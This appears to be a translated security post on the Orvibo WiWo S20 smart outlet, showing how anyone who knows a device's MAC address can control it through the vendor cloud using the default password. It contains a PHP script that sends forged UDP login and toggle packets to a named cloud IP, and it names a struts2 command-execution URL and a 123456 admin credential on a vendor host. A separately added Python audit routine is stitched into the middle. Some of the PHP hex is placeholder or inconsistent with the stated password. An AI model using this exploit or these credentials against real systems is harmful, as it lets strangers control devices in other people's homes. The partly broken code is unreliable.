Smart home devices in other people's homes can be controlled remotely.
I like your design and admire the magic design of smart config,
but it's a little worse.
Orvibo WiWo S20 smart outlet
Protocol Analysis:
Control Switch
UID = MAC + 0x202020202020
MAC address: scan the BSSID
Across different CIDR blocks:
Attacker (counterfeit UID + default password 888888) -> cloud server
Cloud server -> attacker (two UDP response packets)
Attacker (UDP operation code) -> cloud server
Cloud server (UDP operation code) -> controlled device
You only need to know the MAC address and password of other people's devices (most passwords are the default; if you don't believe it, see below) to control them.
Code:
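<?php
// Open a UDP socket to the cloud server.
$fp = fsockopen('udp://42.121.111.208', 10000);
// Login packet: UID (MAC + 0x20 padding) followed by the default password 888888.
$send = pack('H*', 'xxxxxxxx36caccf2108bc4202020202020383838383820202020202020');
fwrite($fp, $send);
$recv = fread($fp, 8192);
// Operation-code packet; byte 18 is copied from the server's response.
$send = pack('H*', '686400176463accf21_bc420202020206b0000000000');
$send[18] = $recv[18];
// Send the opposite of the byte the server returned at offset 23.
$send[22] = $recv[23] == chr(0) ? chr(1) : chr(0);
fwrite($fp, $send);
$recv = fread($fp, 8192);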
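Seen from the cloud server's side, the login step above can be checked before any operation code is forwarded. The following is an added example, not code from the original post or from the vendor; the function names, the 12-byte space-padded password field and the same-network rule are assumptions, and the sample values are constructed.

```python
import ipaddress

UID_PAD = b"\x20" * 6         # page: UID = MAC + 0x202020202020
DEFAULT_PASSWORD = b"888888"  # page: default password, hex 383838383838


def parse_uid(uid: bytes):
    """Return the MAC as aa:bb:... if uid is MAC + six 0x20 bytes, else None."""
    if len(uid) != 12 or uid[6:] != UID_PAD:
        return None
    return ":".join(f"{b:02x}" for b in uid[:6])


def audit_login(uid, password_field, client_ip, device_ip, prefix=24):
    """Hypothetical cloud-side policy check for one login attempt.

    Returns (mac, findings, reject). Assumptions: the password field is
    ASCII right-padded with 0x20, and device_ip is the address the
    outlet's own session comes from.
    """
    mac = parse_uid(uid)
    if mac is None:
        return None, ["malformed-uid"], True
    findings = []
    if password_field.rstrip(b"\x20") == DEFAULT_PASSWORD:
        findings.append("default-password")
    device_net = ipaddress.ip_network(f"{device_ip}/{prefix}", strict=False)
    if ipaddress.ip_address(client_ip) not in device_net:
        findings.append("client-outside-device-network")
    # A MAC learned from a BSSID scan plus the factory password must not be
    # enough to drive a device from another network.
    reject = ("default-password" in findings
              and "client-outside-device-network" in findings)
    return mac, findings, reject


# Constructed sample values: made-up MAC, documentation address ranges.
SAMPLE_UID = bytes.fromhex("001122334455") + UID_PAD
SAMPLE_DEFAULT_PW = DEFAULT_PASSWORD + b"\x20" * 6

if __name__ == "__main__":
    for client in ("198.51.100.20", "203.0.113.9"):
        print(client, audit_login(SAMPLE_UID, SAMPLE_DEFAULT_PW,
                                  client, "198.51.100.7"))
```

A login from the device's own network with the factory password is flagged but allowed, so the owner can still reach the outlet to change the password.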
Combined with vulnerabilities in the cloud, it becomes terrible...
http://vicenter.orvibo.com:20001/struts2 command execution
Weak administrator password: the username and password are both 123456.
So
Remote debug...
No MAC address yet
Don't worry
I'm talking about weak passwords.
383838383838 is the hex of 888888.
You can send commands locally to the cloud for the cloud to forward to devices.
You can also send commands to devices directly from the cloud.
Of course, there is also a lot of firmware: your infrared codes and other firmware are leaked.